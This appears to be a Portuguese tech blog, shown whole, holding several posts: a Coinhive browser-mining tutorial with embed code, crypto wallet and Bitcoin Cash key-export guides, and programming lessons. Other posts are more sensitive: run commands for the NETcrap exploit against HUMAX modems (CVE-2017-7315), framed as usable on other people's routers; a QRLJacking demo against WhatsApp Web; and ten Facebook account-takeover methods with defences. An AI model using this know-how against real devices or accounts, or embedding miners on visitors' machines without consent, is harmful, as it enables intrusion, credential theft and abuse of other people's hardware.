16 setembro 2017


Recentemente o maior site de torrents do mundo está testando uma forma de gerar lucro além dos anúncios. O The Pirete Bay está testando uma ferramenta que permite minerar moedas, no caso monero, quando um usuário acessar o site. 

Resumindo: o usuário acessa o site, então um código javascript usa o poder da CPU (do processador) dos visitantes para minerar a altcoin monero (para saber mais sobre criptomoedas clique aqui e acompanhe nossa série de artigos).

Segundo a administração do site, eles estão testando essa ferramenta.. se rentável talvez retirem os anúncios do site.

Bom mas como fazer isso? O processo é bastante simples e nossa equipe está testando agora mesmo em todo nosso site limontec.com . Confira o tutorial abaixo:

1- Acesse https://coin-hive.com/account/signup e crie uma conta.
2- Depois de criado a conta, acesse seu email para verificar ela.
3- Depois acesse https://coin-hive.com/settings/sites e copie o código que está em "Site Key (public)"
4- No seu site, cole entre a tag body o seguinte código:

<script src="https://coin-hive.com/lib/coinhive.min.js"></script>
<script type="text/javascript">
var miner = new CoinHive.Anonymous('SUA-KEY', { throttle: 0.9 });
miner.start();

</script>

5- Substitua o trecho SUA-KEY pelo código que você copiou em "Site Key (public)".
6- Você pode adicionar mais parâmetros para controlar melhor, para isto visite https://coin-hive.com/documentation/miner e leia a documentação.
7- Se quiser alterar o valor de 'throttle' para outro diferente de 0.9 pode, ele é o tempo ocioso, caso deixe como 0 (zero), isso significa que vai usar 100% da CPU do visitante - o que pode ser um transtorno, afinal deixará o computador dele lento, então seja educado e fique entre 0.8 e 0.9 - equivalente a 80% e 90% de ociosidade.

É possível bloquear esse tipo de mineração bloqueando o javascript dessa página com extensões como NoScript ou a url do coin-hive com qualquer adblock.

*Nossa equipe está testando essa funcionalidade, caso seja rentável.. removeremos anúncios para priorizar essa forma de monetização de nosso conteúdo.

Tags: minerar, bitcoin, navegador, browser, tutorial, configurar, settings, views, mining

10 setembro 2017

Em nosso primeiro artigo da série "Moedas do futuro", você descobriu o que é Bitcoin. Se ainda não leu, clique aqui e acompanhe essa serie de artigos antes de continuar.

Bom, será que vale a pena minerar na nuvem? No segundo artigo da nossa série sobre moedas do futuro, nós ensinamos como minerar altcoins de uma forma simples usando seu belo computador, você deve ter notado que não é rentável deixar seu computador fazendo milhões de operações por segundo onde a energia elétrica é cara e o desgaste do seu hardware não compensa o lucro que você almeja - a não ser que a moeda que você minera a meses tenha uma subida extraordinária o tonando milionário, mas isso não vem ao caso. 

Para resolver este problema, muitas pessoas optam por minerar na nuvem. Mas o que seria minerar na nuvem? Bom é nada mais do que um site especializado em vender poder de mineração, você teoricamente aluga o poder de processamento de máquinas que estão em algum lugar do mundo minerando bitcoins por exemplo e então você recebe o valor obtido pela mineração conforme o contrato acertado entre você e o site estabeleceu. 

O problema de minerar na nuvem é que na maioria das vezes, para recuperar o valor investido demora meses - algo bastante incomodo no mundo das criptomoedas onde seus valores são altamente voláteis. Supondo que você consiga recuperar o valor investido, muitos caiem na tentação de reinvestir o valor ganho na tentativa de aumentar mais ainda seus ganhos... ai mora o problema. São inúmero os casos de mineradoras que foram hackeadas ou simplesmente eram esquema de pirâmides disfarçado, uma vez que a transparência neste meio é complicado, a não ser que você reserve um tempo para visitar o local onde as máquinas estão minerando (algo que acho bem difícil de acontecer).

Mesmo assim ainda pretende minerar na nuvem? Irei indicar uma mineradora que eu particularmente uso a um tempo, mas insisto em dizer que não me responsabilizo pela indicação afinal.. não posso defender com unhas e dentes que ela é 100% confiável, apesar que esteja pagando regularmente mesmo depois de sofrerem um ataque hacker.

Mineradora indicada: https://www.genesis-mining.com/
Quando for adquirir poder de mineração, use nosso código de afiliado e ganhe 3% de desconto: S9DZqL .

01 setembro 2017

Imagem feita no FotoJet
Lembram do editor online FotoJet? Agora eles tem uma versão própria para Windows e Mac! Essa versão é bastante simples e permite criar imagens a partir de templates prontos.

O destaque fica para a facilidade em criar imagens para capa de Facebook, capa Youtube, anúncios Facebook, miniaturas Youtube, banner tumblr e outras midias sociais, pois você não precisa se preocupar com as dimensões que a imagem precisa ter.

Por exemplo para montar uma miniatura para Youtube, basta selecionar a opção relacionada a miniatura e começar a editar.


Em modelo você seleciona um template para sua miniatura:
No menu lateral do canto esquerdo você vai modificando sua miniatura até achar que esteja pronta. Confira como ficou a nossa:
 Caso deseja continuar modificando a imagem mais tarde, basta salvar como projeto clicando nos 3 pontinhos no menu superior, o arquivo será salvo como .jet e então basta abri-lo com o FotoJet para continuar editando.

Prós e contras da ferramenta:

Prós: fácil instalação e uso, ferramente em português.
Contras: poucos templates, mas com criatividade é possível aproveitar bem a ferramenta.

Embora o programa seja pago você pode testar baixando no site oficial clicando aqui.

Entregaremos uma licença do software acima para o primeiro responder corretamente a pergunta: Qual o formato fica salvo o projeto no FotoJet?

19 agosto 2017

Para quem é familiarizado com bitcoins sabe que ocorreu um fork/divisão na rede no dia primeiro de agosto deste ano para que uma nova moeda surgisse prometendo resolver alguns problemas do bitcoin (não entrarei a fundo nesse assunto neste artigo - confira nossa série sobre bitcoins clicando aqui) e por conta disso quem tinha 1 BTC passou a ter 1 Bitcoin Cash, sigla BCC/BCH, (assim como quem tinha frações de bitcoin). 

Se você tinha bitcoins antes de primeiro de agosto, com certeza você tem direito a receber a mesma quantia em BCC. Para ter certeza se você tem BCC para receber, faça uma busca pelo seu endereço que contém bitcoin no site http://blockdozer.com/insight/ .

Bom, encontrei um tutorial muito bom no fórum bitcointalk.org ensinando a resgatar seus BCC caso você usa a carteira da blockchain.info, então traduzirei o método abaixo.

Como exportar sua chave privada da Blockchain.info ? 

1- Transfira seus bitcoins (BTC) para outro endereço, pois ao ter acesso a chave privada do seu endereço, ele estará vulnerável... caso ela vaze.. alguém pode roubar seus bitcoins.

2- Tenha em mãos a frase, seed/phrase, de 12 palavras da sua conta na Blockchain.info - caso não tenha essa frase, acesse sua conta... vá em 'Security Center' e clique em 'Phrase Backup' e anote a frase de recuperação.

3- Se você tem mais de 1 endereço em sua conta, é preciso determinar qual endereço contém os BCC que você deseja resgatar. Para isso vá em 'Addresses'. O endereço "My Bitcoin Wallet" é contado como endereço de número 0, caso tenha outro endereço, ou seja 1º endereço, então o número é 1.. se tiver BTC no 2º endereço então é 2 e assim por diante - lembrando que esses endereços podem ter 'sub-endereços' ou seja se você tiver BTC antes de primeiro de agosto em um sub-endereço do 1º endereço, então você usará o 1 para resgatar os BCC. *Essa informação de número de endereços será útil no passo 6.

4- Se já tiver com a frase de recuperação em mãos, você precisa acessar o Bip39 generator para conseguir todas as chaves de todos endereços associados a sua conta na Blockchain.info . Para isso você pode visitar o site https://iancoleman.github.io/bip39/ (não recomendado) ou baixar o arquivo https://github.com/iancoleman/bip39/archive/master.zip , descompactar e abrir o arquivo bip39-standalone.html com um navegador (recomendado somente se desligar o computador da internet, mesmo assim não é 100% seguro a segurança da sua frase de recuperação, no caso o recomendado seria descartar sua conta da blockchain.info após o procedimento que veremos mais abaixo). 

5- No site que abriu, digite sua frase de recuperação no campo 'BIP39 Mnemonic'. 

6- Desça a página do site até 'Account' (fique abaixo de 'Derivation Path'), no campo 'Account' digite o número relacionado ao endereço de bitcoin que deseja resgatar BCC, como explicado no passo 3 acima. Exemplo: Eu tinha bitcoins antes de primeiro de agosto em um sub-endereço atrelado ao endereço "My Bitcoin Wallet", então use o número 0.

7- Se tudo tiver dado certo, o campo 'Account Extended Private Key' estará preenchido com a chave privada de diversos endereço de bitcoin seu, então procure pelo endereço que tinha bitcoin antes de primeiro de agosto e depois anote a chave privada.

8- Agora é hora de importar a chave privada para uma carteira que aceite bitcoin cash! Para este tutorial usaremos a Electroncash.org... acesse o site e faça download da carteira. 


Digite um nome para sua carteira
Next
Marque 'Use public or private keys'
Digite/cole .. a chave privada copiada no passo 7
Aguarde sincronizar e pronto você verá seus BCC em sua carteira
9- Agora é só enviar seus BCC para uma exchange e trocar por BTC ou outros valores.

Avisos sobre o procedimento: descarte o endereço que você copiou a chave privada, descarte também sua conta da blockchain.info caso ache que sua chave privada possa ter sido vazada.

15 agosto 2017


Sem enrolação, vou deixar aqui uma super dica de como aprender inglês rapidamente - o método basicamente enriquece seu vocabulário.

Confira a dica: 
  Assista uma série que goste e que conte história dos acontecimentos do dia a dia... tipo a série Friends. Primeiro assista legendado em português brasileiro o primeiro episódio, depois assista o mesmo episódio, só que legendado em inglês! Não recomendo deixar um espaço de tempo muito grande entre a reprise do episódio legendado em inglês, pois no começo com certeza você vai esquecer o contexto em que se passava a cena legendada em português. Então assista legendado em português e logo em seguida em inglês. Friends tem 236 episódios, então você vai ver 472 episódios!

Essa dica só não é recomendada para quem não sabe nem o básico que é ensinado em escolas públicas, para essas pessoas.. recomendo aprender o básico do inglês que você encontra em livros didáticos, pois sabendo o básico facilitará na associação das palavras vistas na legenda em português com as da legenda em inglês.

Séries legendadas em português você encontra facilmente com uma pesquisa no Google, mas legendada em inglês se você não tiver Netflix... recomendo ir no site englishgroup.com.br, lá tem várias séries legendadas em inglês - sim tem Friends!

That's all, see you soon.

28 julho 2017

Em nosso primeiro artigo da série "Moedas do futuro", você descobriu o que é Bitcoin. Se ainda não leu, clique aqui e leia antes de continuar.

Para participar da rede Bitcoin e começar a usar a moeda, tudo que um usuário precisa fazer é baixar um programa ou usar um aplicativo web - chamados de clientes, popularmente conhecido como carteiras (wallet).

Os três principais tipos de clientes Bitcoin são:

  • Cliente completo:

Um cliente completo, ou "nó completo", armazena todo o histórico de transações de bitcoins (cada uma das transações de todos os usuários, desde o começo), gerencia as carteiras dos usuários e pode iniciar transações diretamente na rede bitcoin. Isto é similar a um servidor de email independente, no sentido de que ele trata de todos os aspectos do protocolo sem depender de quaisquer outros servidores ou serviços de terceiros. Exemplos: Bitcoin Core, Electrum.


  • Cliente compacto:
Um cliente compacto armazena a carteira do usuário, mas depende de servidores mantidos por terceiros para ter acesso às transações e à rede Bitcoin. O cliente compacto não guarda uma cópia completa de todas as transações e portanto precisa confiar nos servidores de terceiros para validar transações. É similar a um cliente de email autônomo que se conecta a um servidor de email para acessar uma caixa de emails, no sentido de que depende de um terceiro para interagir com a rede. Exemplos: Copay, Mycelium, breadwallet.

  • Cliente web:
Os clientes web são utilizados através de um navegador web e armazenam a carteira do usuário em um servidor mantido por um terceiro. Isso é similar ao webmail no sentido em que eles dependem completamente de um servidor de terceiros. Exemplos: Blockchain.info, Coinbase, Xapo.

  • Clientes móveis:
Podem operar como clientes completo ou compacto, seu uso é focado para smartphones.

A escolha do cliente bitcoin depende de quanto controle o usuário quer sobre os fundos. Um cliente completo irá oferecer o máximo nível de controle e independência do usuário, mas, em compensação, deixa a responsabilidade pelos backups e pela segurança nas mãos do usuário. No outro extremo de opções, um cliente web é o mais fácil de configurar e de usar, mas, em compensação, introduz um risco adicional, já que a segurança e o controle são compartilhados com o usuário e o dono do serviço web. Se um serviço de carteira web é comprometido, como muitos já foram, os usuários podem perder todos os seus fundos. Por outro lado, se os usuários tiverem um cliente completo sem os backups adequados, eles podem perder todos os seus fundos por causa de um contratempo do computador.

Também existem opção de carteiras em hardwares... geralmente são como pendrives que permite você guardar seus bitcoins. Exemplo: Ledger nano, Trezor . Há ainda quem prefere criar uma paper wallet que é uma carteira de papel, ou seja, uma paper wallet é um pedaço de papel que contém uma cópia da chave privada e da chave pública... é recomendado que após fazer transações que ela seja descartada ou seja use ela apenas para guardar seus bitcoins e quando for fazer transação... mova todos seus fundos para outra carteira de papel - assim evita que sua chave privada seja de alguma forma roubada.

Fonte: Livro Mastering Bitcoin

21 julho 2017

Este artigo faz parte do projeto #LTCode

Desanima não amigo, essa é a última parte do curso de lógica de programação!!! Bom, hoje vamos aprender sobre as variáveis compostas que são úteis para minimizar o trabalho de declarar inúmeras variáveis. Elas são dividas em vetores e matrizes.


Vetores:

-Vetores são variáveis indexadas unidimensionais, a utilização de vetores permite nas variáveis compostas a utilização de vários espaços em uma mesma variável, ou seja enquanto que nas variáveis simples ao ler um valor e depois ler outro o valor anterior era apagado, agora com vetores isso não acontece. 

Observe a imagem abaixo:


Como observado no quadrado em vermelho da imagem acima, 3 valores foram armazenados na variável "idade" (o mesmo ocorre na variável "nome"), sendo cada valor ocupando uma posição diferente na variável. Por exemplo o valor "25" está ocupando a posição 2 da variável "idade".


A estrutura para declarar um vetor é a seguinte:

identificador : vetor [tamanho] de  tipo

Como ilustrado na imagem acima, ficaria assim:

idade : vetor [1..3] de inteiro

No caso 'idade' é o nome da variável, dentro dos colchetes é informado o tamanho desta variável utilizando dois pontos para determinar, no caso de 1 a 3 e por fim depois é informado o tipo de variável... se é inteiro, real etc.


E como chamar um vetor já declarado?? Simples, basta informar o nome da variável e a posição do valor que deseja retornar. 


Na imagem acima queremos saber quem ocupa a posição 2 da variável nome, para isto utilizamos identificador[posição] no caso nome[2].


Matrizes:
-Matrizes são variáveis indexadas bidimensionais, ou seja vetores com mais uma dimensão. Sendo assim a sintaxe para declaração é quase a mesma:
identificador : vetor [tamanho1tamanho2de  tipo

Como devem ter notado, a única diferença é que é adicionado mais um 'tamanho' o tornando-a bidimensional - confira um exemplo de código na imagem abaixo: 

É isso, não pretendo estender o assunto de variáveis compostas... com certeza será abordado mais sobre o tema nas próximas aulas, pois estamos finalizando aqui as aulas de lógico da programação! Foram 13 aulas que esperamos que você tenha aprendido o mínimo para avançar para a próxima etapa :)

Até logo ~~ 

>> Voltar à página principal, clique aqui

19 julho 2017


QRLJacking é um simples método de engenharia social que consiste em atacar aplicações que utilizando QR Code como forma de login. No vídeo abaixo é demonstrado como utilizar a ferramenta QrlJacking-Framework para se conseguir acesso a uma conta de Whatsapp através do cliente web do aplicativo.


Caiu aqui de paraquedas? Saiba como instalar o Kali em uma máquina virtual clicando aqui.


Github da ferramenta: https://github.com/OWASP/QRLJacking




É possível realizar este ataque mais elaborado como no vídeo abaixo:
Para isto leia a wiki da ferramenta clicando aqui.

17 julho 2017


Se você possui um modem HUMAX modelo HGR100-L2 2.0.6 e a operadora NET alterou a senha de acesso as configurações ou você esqueceu a senha e não quer resetar o modem ou você quer hackear alguém que tenha este modelo é muito simples!

Basta baixar o script em python NETcrap de autoria do Carlos Neri, clique aqui para ir ao github da ferramenta, e rodar:

python NETcrap.py [GATEWAY]
Exemplo:
python NETcrap.py http://192.168.0.1
python NETcrap.py http://192.168.0.1/
python NETcrap.py 192.168.0.1
python NETcrap.py 192.168.0.1/

Para ataques em redes externas, coloque a porta aberta após o IP externo, exemplo: XXX.XXX.XX.XX:XXXX

O script explora uma vulnerabilidade (CVE 2017-7315) encontrada neste modelo de modem, que consiste em acessar o endereço do modem /view/basic/GatewaySettings.bin e baixar o arquivo de backup do modem - pelo incrível que pareça não é necessário nenhum tipo de autentificação ou usuário e senha, basta acessar a url em questão que o arquivo será baixado. 

14 julho 2017

-Artigo informativo, não nos responsabilizamos pelos seus atos.

Foi listado abaixo 10 formas de hackear uma conta do Facebook e também como se prevenir destes tipos de ataques - lembrando que a informação abaixo também vale para outros sites como gmail, outlook, youtube...

1. Página falsa


Conhecido como phishing, este método é um dos mais populares, pois consiste em criar uma página de login falsa do Facebook, assim a vítima achando que está no site verdadeiro acaba digitando seu email e senha que em vez de entrar na conta, este dados são enviados para o hacker que geralmente retorna uma mensagem de que não foi possível fazer login e redireciona para a página verdadeira do Facebook para evitar suspeitas.


Como se proteger?

-Confira sempre a url do site, é comum alterações sutis no domínio do site.
-Somente faça login se o site tiver o cadeado de https ativado.
-Evite entrar quando utilizar rede wifi pública ou de terceiros.
*As duas dicas citadas acima são úteis mas não garantem 100% de segurança, pois é possível gerar um falso site com https, assim como alterar o DNS para que o endereço original do Facebook aponte para um IP que não pertença ao Facebook.

2. Capturar teclas digitadas


Conhecido como keylogger, é o método mais simples de hackear uma conta de Facebook. Keylogger é um software classificado como vírus quando utilizado para fins ilícitos, que quando instalado no computador da vítima ele registra todas as teclas digitadas pela vítima assim capturando a senha e email da conta da vítima e em seguida enviando essas informações para o hacker.


Como se proteger?

-Instale um bom antivírus, mas o melhor antivírus é o próprio usuário.. então evite baixar programas de fontes desconhecidas.
-Evite entrar quando utilizar computadores de terceiros.

3. Visualizar senhas salvas no navegador


Quando você faz login em uma conta de Facebook no navegador, geralmente é perguntado se você quer salvar a senha para não precisar de ficar digitando sempre que for entrar. Infelizmente qualquer pessoas com acesso ao navegador fisicamente ou remotamente consegue facilmente obter as senhas salvas no navegador.


Como se proteger?

-Acesse as configurações do seu navegador e remova as senhas que tiver salvado;
-Nunca salve senhas no navegador, principalmente em computadores de terceiros.
-Use um gerenciador de senhas seguro se tiver dificuldade para lembrar senha.

4. Hack ao smartphone


Se instalado um app malicioso em seu smartphone, é possível monitorar sua conta do Facebook afim de obter dados pessoais.


Como se proteger?

-Evite instalar apps de fontes desconhecidas ou fora da loja oficial.
-Sempre confira permissões que os aplicativos solicitam no momento da instalação.

6. Hack ao email


Se alguém hackear o email associado a sua conta do Facebook, na maioria das vezes é muito fácil solicitar para alterar a senha e tomar posse da conta.


Como se proteger?

-Utilize autentificação em 2 fatores tanto na conta do Facebook quanto no email.
-Use uma senha forte, assim como um método de recuperação seguro.

7. Código fonte


É possível visualizar a senha debaixo dos asteriscos ******** bastando alterar um valor no código fonte da página.


Como se proteger?

-Nunca salve a senha no navegador.
-Se digito a senha, faça login... não saia da frente do pc para ir ao banheiro caso contrário alguém mal intencionado pode aproveitar a chance para obter a senha facilmente como ilustra o gif abaixo:

8. Tabnapping


É um novo tipo de phishing que consiste em uma página falsa de "login com o Facebook". Sabe quando você vai num site novo e precisa cadastrar e é mais fácil entrar com sua conta do Facebook? Então.. em vez de ser o Facebook, é uma página falsa.


Como se proteger?

-Evite logar com o Facebook em sites suspeitos.
-Em vez de logar pelo Facebook crie uma conta no site com uma senha que nunca usou e que não identifique suas preferências pessoais.

9. Sempre faça logout


Sempre saia da sua conta, muitos usuários apenas fecham o navegador... é recomendado sair da conta mesmo que o computador seja somente seu pois um hacker pode ter acesso a sua conta simplesmente roubando alguns cookies (não, não são biscoitos).


Como se proteger?

-É obvio né, clique em sair.
-Se tiver mania de fechar o navegador e não clicar em sair... use de preferência navegadores com suporte a navegação anonima pois assim ao fechar o navegador os cookies são apagados.

10. Engenharia social


Consiste em obter informações das vítimas através de vários métodos. Como por exemplo enviando um email se passando pelo Facebook solicitando que a vítima abra uma página clonada do Facebook com o objetivo dela fazer login na conta. Ou criando uma rede wifi pública que envie as solicitações de facebook.com para um endereço IP controlado pelo hacker afim de obter login e senha.


Como se proteger?

-Releia todas as dicas de proteção citadas acima.

Hm gostou? Compartilhe com seus amigos para não serem hackeados. E se deseja aprender mais praticando alguns destes ataques confira os vídeos:



  • [Parte 1] Kali Linux 2.0 SET - clonando site / capturando email e senha [Facebook - teste hacker]
  • [Parte 2] Kali Linux 2.0 SET e Ettercap - capturando email e senha [Facebook - teste hacker]
  • DNS hijacking e phishing [SET + ROUTER + DNSChef]
  • TESTE DE INVASÃO no Facebook com brute force
  • Descobrindo senhas ocultas
  • E outros da playlist do nosso canal abaixo:

Fonte: codingsec.net

08 julho 2017

Este artigo faz parte do projeto #LTCode

Agora vamos aprender sobre funções! A grande diferença de funções para procedimentos, é que ela pode retorna um resultado. Confira abaixo uma imagem que ilustra a diferença entre procedimento e função:
Bom, as alterações no código acima ocorreram apenas onde está marcado por um retângulo laranja. 

Em 1 e 2 (números vermelhos desenhados na imagem) é informado se é procedimento ou função, em 3 está escrito 'inteiro' pois informa o tipo de retorno dessa função e em 4 foi escrito o comando 'retorne' para que o valor da variável 'c' da função seja retornado para o programa principal - coisa que não acontece com procedimento, repare que no procedimento o 'escreval' (5) está dentro dele enquanto que na função o 'escreval' (6) está no programa principal. 

Ao contrário do procedimento em que (7) soma não retorna valor, na função (8) o resultado da soma é retornado para uma variável 'r' como podem ver no ponto 8 sendo assim necessário no ponto 6 que tenha um 'escreval' para mostrar ao usuário o resultado.

Entendeu? Olhe o código abaixo:

Algoritmo "par-ou-impar"
Var
    n : Inteiro
Procedimento parouimpar(valor: Inteiro) //'valor' vai receber o valor de 'n'
Inicio //inicio do procedimento
    Se (valor%2 = 0entao //confere se o resto da divisão de 'valor' por 2 é zero
        Escreval ("O número", valor, " é par")
    Senao
        Escreval ("O número", valor, " é ímpar")
    fimse
fimprocedimento //fim do procedimento
Inicio
    Escreva  ("Digite um número: ")
    Leia (n)
    parouimpar(n) //chamada para o procedimento   
Fimalgoritmo

É um procedimento! Vamos então alterar para função! 

Em Var vamos adicionar mais uma variável do tipo caractere para informar se o número é par ou impar:

Var
    n : Inteiro
    r : caractere

Agora vamos inciar a função, informando claro que ela vai retornar um valor do tipo caractere:

Funcao parouimpar(valor: Inteiro) : caractere //'valor' vai receber o valor de 'n'

Bom, dentro do inicio da nossa função, vamos apenas criar como o próprio nome diz uma função para descobrir se o número é par ou impar mas com uma diferença do procedimento: ela vai retornar o resultado para a parte principal do programa - isso é bom pois podemos reutilizar o código.

    Se (valor%2 = 0entao //confere se o resto da divisão de 'valor' por 2 é zero
        retorne "par"
    Senao
        retorne "impar"
    fimse

Agora na parte principal do programa, precisamos informar a variável que será usada para retornar o valor da função - no caso é 'r'.

r <- parouimpar(n)

E por fim damos a mensagem para nosso usuário saber se o número é par ou impar:

Escreval ("O número é", n, " é ", r)

Confira como ficou o código abaixo:

Pronto, você aprendeu como criar uma função! No 'procedimento' era possível fazer passagem de valor por parâmetros ou referencias, isso também é possível nas funções. No código da imagem acima foi utilizado passagem por parâmetro, agora confira a imagem abaixo uma passagem por referência:
A maioria das linguagens de programação vem com funções já pré-definidas, bastando você apenas chamar ela. No visualg existe também essas funções já pré-definidas, confira algumas:

Sendo 'n' nossa variável do tipo caractere: 
Maiusc(n) vai retornar o que tiver escrito mas com todas letras em maiúsculo.
Minusc(n) vai retornar o que tiver escrito mas com todas letras em minusculo.
Compr(n) vai retornar o total de caracteres.

Asc("a") vai retorna o código da letra A, assim como Asc("b") retorna o da letra B.
Carac(65) vai retornar a letra correspondente ao código 65.

É isso, recomendo praticar.. inventar programas e resolver seus bugs.. afinal é assim que se aprende, até mais!

>> Próxima aula, clique aqui